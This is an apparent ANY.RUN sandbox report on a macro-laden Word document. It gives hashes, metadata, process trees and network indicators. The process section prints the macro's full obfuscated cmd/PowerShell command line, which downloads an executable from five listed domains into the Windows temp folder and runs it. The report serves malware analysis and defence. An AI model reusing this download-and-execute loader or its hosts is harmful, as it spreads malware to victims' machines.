analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

US83778619249570511.doc

Full analysis: https://app.any.run/tasks/d0f2a85e-4308-45ed-869b-6313782a1d0f
Verdict: Malicious activity
Analysis date: February 18, 2019, 09:00:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
macros-on-close
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 6, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Fri Feb 15 14:25:00 2019, Last Saved Time/Date: Fri Feb 15 14:27:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

94866728C2FD65680393781AE8F35822

SHA1:

29C552307CFF6FFB1EA0EF95183E2447A51D044B

SHA256:

179A92BA3314BE573380DE2049B467D29B33A87F5EE506E357D093E7D7E46F2D

SSDEEP:

3072:w0gPv0gPqJDRqHgIhqRQfMS7G4UB4IsspevHfXgvoUXIakRdIvNMpiz6xPOSrSE:opqhRqHg/aN7GjsspevHf8fkklTzG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2916)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2916)
    • Executes PowerShell scripts

      • cmd.exe (PID: 4000)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2496)
    • Removes files from Windows directory

      • powershell.exe (PID: 2496)
    • Creates files in the Windows directory

      • powershell.exe (PID: 2496)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2916)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2916)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Word 97-2003
CompObjUserTypeLen: 32
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2019:02:15 14:27:00
CreateDate: 2019:02:15 14:25:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 6
LastModifiedBy: Admin
Template: Normal.dotm
Comments: -
Keywords: -
Author: Admin
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2916"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\US83778619249570511.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
4000c:\windows\system32\cmd /c set _xxx=p&& set _yyy=owersh&& set _zzz=ell&& call %_xxx%%_yyy%%_zzz% $K5My4u = '$DrGHIly0c = new-obj0-10361093520ect -com0-10361093520obj0-10361093520ect wsc0-10361093520ript.she0-10361093520ll;$vh576j = new-object sys0-10361093520tem.net.web0-10361093520client;$xjFdD5Yz = new-object random;$GLC65c = \"0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://ishqekamil.com/ciY34zeKn3d,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://cvlancer.com/CWvd8iMnLfj9C,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://aucklandluxuryrealestatelistings.com/pHXewgm3qzll_3L,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://nosomosgenios.com/cCZThGY1_wVKtkj23V,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://2647403-1.web-hosting.es/blMc65Xgegv_YFDyjpRH\".spl0-10361093520it(\",\");$AvhcBOm = $xjFdD5Yz.nex0-10361093520t(1, 65536);$jauHDgE9o = \"c:\win0-10361093520dows\tem0-10361093520p\195.ex0-10361093520e\";for0-10361093520each($SGKszWC in $GLC65c){try{$vh576j.dow0-10361093520nlo0-10361093520adf0-10361093520ile($SGKszWC.ToS0-10361093520tring(), $jauHDgE9o);sta0-10361093520rt-pro0-10361093520cess $jauHDgE9o;break;}catch{}}'.replace('0-10361093520', $gZLbtF);$vaWgt0dZG = '';iex($K5My4u);c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2496powershell $K5My4u = '$DrGHIly0c = new-obj0-10361093520ect -com0-10361093520obj0-10361093520ect wsc0-10361093520ript.she0-10361093520ll;$vh576j = new-object sys0-10361093520tem.net.web0-10361093520client;$xjFdD5Yz = new-object random;$GLC65c = \"0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://ishqekamil.com/ciY34zeKn3d,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://cvlancer.com/CWvd8iMnLfj9C,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://aucklandluxuryrealestatelistings.com/pHXewgm3qzll_3L,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://nosomosgenios.com/cCZThGY1_wVKtkj23V,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://2647403-1.web-hosting.es/blMc65Xgegv_YFDyjpRH\".spl0-10361093520it(\",\");$AvhcBOm = $xjFdD5Yz.nex0-10361093520t(1, 65536);$jauHDgE9o = \"c:\win0-10361093520dows\tem0-10361093520p\195.ex0-10361093520e\";for0-10361093520each($SGKszWC in $GLC65c){try{$vh576j.dow0-10361093520nlo0-10361093520adf0-10361093520ile($SGKszWC.ToS0-10361093520tring(), $jauHDgE9o);sta0-10361093520rt-pro0-10361093520cess $jauHDgE9o;break;}catch{}}'.replace('0-10361093520', $gZLbtF);$vaWgt0dZG = '';iex($K5My4u);C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 487
Read events
1 008
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8A06.tmp.cvr
MD5:
SHA256:
2496powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8SP2WW4JDWHIFXZNU1O4.temp
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF9C36BFA5A4F3819D.TMP
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF511559BE1E392A58.TMP
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB831458AAE49C531.TMP
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9B5C50B-96A0-41DB-8BB7-089D393CEB15}.tmp
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D702C097-331F-4B9E-B0BC-FBF89E2C552C}.tmp
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFE9B2662D9AE6DCE9.TMP
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{40E98C3D-1889-4217-91E4-61218C5F8186}.tmp
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$83778619249570511.docpgc
MD5:79EFCE09D199D5DFF963F4661A4A9581
SHA256:B4693F1B5ABCD57F84EDE551FB65F13719122B067872A1C18706DD512710D626
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2496
powershell.exe
GET
404
160.153.138.163:80
http://cvlancer.com/CWvd8iMnLfj9C
US
xml
345 b
malicious
2496
powershell.exe
GET
404
162.144.57.226:80
http://ishqekamil.com/ciY34zeKn3d
US
xml
345 b
suspicious
2496
powershell.exe
GET
404
87.98.231.40:80
http://nosomosgenios.com/cCZThGY1_wVKtkj23V
ES
xml
345 b
malicious
GET
404
176.28.103.205:80
http://2647403-1.web-hosting.es/blMc65Xgegv_YFDyjpRH
ES
xml
345 b
malicious
2496
powershell.exe
GET
404
148.72.14.211:80
http://aucklandluxuryrealestatelistings.com/pHXewgm3qzll_3L
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2496
powershell.exe
160.153.138.163:80
cvlancer.com
GoDaddy.com, LLC
US
malicious
2496
powershell.exe
162.144.57.226:80
ishqekamil.com
Unified Layer
US
suspicious
2496
powershell.exe
148.72.14.211:80
aucklandluxuryrealestatelistings.com
GoDaddy.com, LLC
US
suspicious
2496
powershell.exe
87.98.231.40:80
nosomosgenios.com
OVH SAS
ES
malicious
176.28.103.205:80
2647403-1.web-hosting.es
acens Technologies, S.L.
ES
malicious

DNS requests

Domain
IP
Reputation
ishqekamil.com
  • 162.144.57.226
suspicious
cvlancer.com
  • 160.153.138.163
malicious
aucklandluxuryrealestatelistings.com
  • 148.72.14.211
malicious
nosomosgenios.com
  • 87.98.231.40
malicious
2647403-1.web-hosting.es
  • 176.28.103.205
malicious

Threats

No threats detected
No debug info